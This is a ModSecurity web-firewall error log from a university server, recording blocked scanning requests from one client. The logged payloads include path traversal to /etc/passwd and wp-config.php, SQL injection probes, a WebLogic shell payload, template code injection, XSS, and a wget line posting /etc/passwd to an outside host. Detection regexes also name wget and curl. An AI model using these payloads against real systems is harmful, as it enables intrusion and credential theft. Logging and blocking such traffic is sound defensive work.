[Tue Aug 29 11:46:20.619565 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:/etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:/etc/passwd: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/Export_Log"] [unique_id "ZO14HMCo-f0AAAhBSHYAAAAX"]
[Tue Aug 29 11:46:23.433395 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:customerTID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:customerTID: unpossible' UNION SELECT 0,0,0,11132*379123,0,0,0,0--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/cgi-bin/supportInstaller"] [unique_id "ZO14H8Co-f0AAAhtjkkAAAAq"]
[Tue Aug 29 11:46:27.394724 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:f. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:f: /./etc/./passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/img.php"] [unique_id "ZO14I8Co-f0AAAi2yE8AAAAN"]
[Tue Aug 29 11:46:28.380887 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../etc/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/laravel-filemanager/download"] [unique_id "ZO14JMCo-f0AAAhui4MAAAAr"]
[Tue Aug 29 11:46:28.396893 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:path: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/cgit/cgit.cgi/git/objects/"] [unique_id "ZO14JMCo-f0AAAib55cAAAAA"]
[Tue Aug 29 11:46:28.502719 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:style: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/webmail/calendar/minimizer/index.php"] [unique_id "ZO14JMCo-f0AAAi0JN0AAAAK"]
[Tue Aug 29 11:46:29.407515 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c/ found within ARGS:style: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c/etc\\x5cpasswd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/webmail/calendar/minimizer/index.php"] [unique_id "ZO14JcCo-f0AAAhZRqEAAAAG"]
[Tue Aug 29 11:46:30.752812 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14JsCo-f0AAAhtjlgAAAAq"]
[Tue Aug 29 11:46:30.815043 2023] [:error] [pid 2245] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:test_handle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  = ( found within ARGS:test_handle: com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField(\\x22connectionHandler\\x22);field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImp..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/console/images/%2e%2e%2fconsole.portal"] [unique_id "ZO14JsCo-f0AAAjFod4AAAAF"]
[Tue Aug 29 11:46:31.404105 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:file: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/download/index.php"] [unique_id "ZO14J8Co-f0AAAhtjl8AAAAq"]
[Tue Aug 29 11:46:31.571389 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:url: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/api/geojson"] [unique_id "ZO14J8Co-f0AAAjCa9EAAAAB"]
[Tue Aug 29 11:46:33.420504 2023] [:error] [pid 2250] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:picUrl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ./../ found within ARGS:picUrl: ./../config/database.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/public/index.php/material/Material/_download_imgage"] [unique_id "ZO14KcCo-f0AAAjKypkAAAAQ"]
[Tue Aug 29 11:46:33.422189 2023] [:error] [pid 2247] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:target: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14KcCo-f0AAAjH@t0AAAAI"]
[Tue Aug 29 11:46:34.436631 2023] [:error] [pid 2247] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:InternalFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:InternalFile: ../../../../../../../../../../../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO14KsCo-f0AAAjH@uQAAAAI"]
[Tue Aug 29 11:46:35.431005 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:REINDEX:phpcli. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x22<? found within ARGS:REINDEX:phpcli: echo \\x22<?php phpinfo();\\x22 > /var/www/html/magmi/web/info.php; php "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/magmi/web/magmi_saveprofile.php"] [unique_id "ZO14K8Co-f0AAAi5uJEAAAAS"]
[Tue Aug 29 11:46:39.432931 2023] [:error] [pid 2247] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/usr-cgi/logdownload.cgi"] [unique_id "ZO14L8Co-f0AAAjH@vkAAAAI"]
[Tue Aug 29 11:46:41.435529 2023] [:error] [pid 2247] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:name: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/webapi/file/transfer"] [unique_id "ZO14McCo-f0AAAjH@v8AAAAI"]
[Tue Aug 29 11:46:42.463348 2023] [:error] [pid 2250] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:username: {{username}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO14MsCo-f0AAAjKyr4AAAAQ"]
[Tue Aug 29 11:46:43.495117 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,md5(999999999),3,4,5-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/admin/manage_user.php"] [unique_id "ZO14M8Co-f0AAAjM7AAAAAAT"]
[Tue Aug 29 11:46:47.463726 2023] [:error] [pid 2168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:refurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: }}}; found within ARGS:refurl: }}};alert(document.domain)//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/owa/auth/frowny.aspx"] [unique_id "ZO14N8Co-f0AAAh4DeUAAAA2"]
[Tue Aug 29 11:46:50.423243 2023] [:error] [pid 2168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:id: -1 UNION SELECT 1,md5(999999999),3,4,5,6,7,8--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14OsCo-f0AAAh4DfEAAAA2"]
[Tue Aug 29 11:46:52.490430 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/sites/all/modules/avatar_uploader/lib/demo/view.php"] [unique_id "ZO14PMCo-f0AAAhT38gAAAAD"]
[Tue Aug 29 11:46:53.891663 2023] [:error] [pid 2231] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/cgi-bin/execute_cmd.cgi"] [unique_id "ZO14PcCo-f0AAAi3Z2QAAAAP"]
[Tue Aug 29 11:47:01.363098 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14RcCo-f0AAAjdQK8AAAAZ"]
[Tue Aug 29 11:47:01.394699 2023] [:error] [pid 2251] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:href. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:href: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php"] [unique_id "ZO14RcCo-f0AAAjL8ScAAAAR"]
[Tue Aug 29 11:47:02.550437 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:partcode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);{/ found within ARGS:partcode: {dede:field name='source' runphp='yes'}echo md5(\\x22CVE-2018-7700\\x22);{/dede:field}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/tag_test_action.php"] [unique_id "ZO14RsCo-f0AAAjM7CIAAAAT"]
[Tue Aug 29 11:47:03.488248 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:likebtn_q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:likebtn_q: aHR0cDovL2xpa2VidG4uY29tLm9hc3QubWU=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14R8Co-f0AAAjdQLUAAAAZ"]
[Tue Aug 29 11:47:05.474710 2023] [:error] [pid 2251] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:filename: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/download"] [unique_id "ZO14ScCo-f0AAAjL8SwAAAAR"]
[Tue Aug 29 11:47:06.801135 2023] [:error] [pid 2250] [client 143.42.78.27] ModSecurity: Rule 7fe1c6360a88 [id "981242"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "237"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repositoryfeb.unla.ac.id"] [uri "/cgi-bin/readycloud_control.cgi"] [unique_id "ZO14SsCo-f0AAAjKyvYAAAAQ"]
[Tue Aug 29 11:47:06.801209 2023] [:error] [pid 2250] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repositoryfeb.unla.ac.id"] [uri "/cgi-bin/readycloud_control.cgi"] [unique_id "ZO14SsCo-f0AAAjKyvYAAAAQ"]
[Tue Aug 29 11:47:07.362491 2023] [:error] [pid 2165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:open. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:open: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php"] [unique_id "ZO14S8Co-f0AAAh130IAAAAz"]
[Tue Aug 29 11:47:07.650027 2023] [:error] [pid 2266] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:name[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:name[]: $(wget --post-file /etc/passwd cjmnbitjmimt14dgn26gttjpu4eotprrr.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/api/getServices"] [unique_id "ZO14S8Co-f0AAAjavzIAAAAV"]
[Tue Aug 29 11:47:10.875910 2023] [:error] [pid 2282] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:value: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/api/change_setting"] [unique_id "ZO14TsCo-f0AAAjqDEIAAAAH"]
[Tue Aug 29 11:47:11.382444 2023] [:error] [pid 2276] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../ found within ARGS:fn: ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/cs/career/getSurvey.jsp"] [unique_id "ZO14T8Co-f0AAAjkM1YAAAAI"]
[Tue Aug 29 11:47:13.443494 2023] [:error] [pid 2238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:libpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:libpath: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/sniplets/modules/syntax_highlight.php"] [unique_id "ZO14UcCo-f0AAAi@TCsAAAAM"]
[Tue Aug 29 11:47:14.394730 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14UsCo-f0AAAjCbE0AAAAB"]
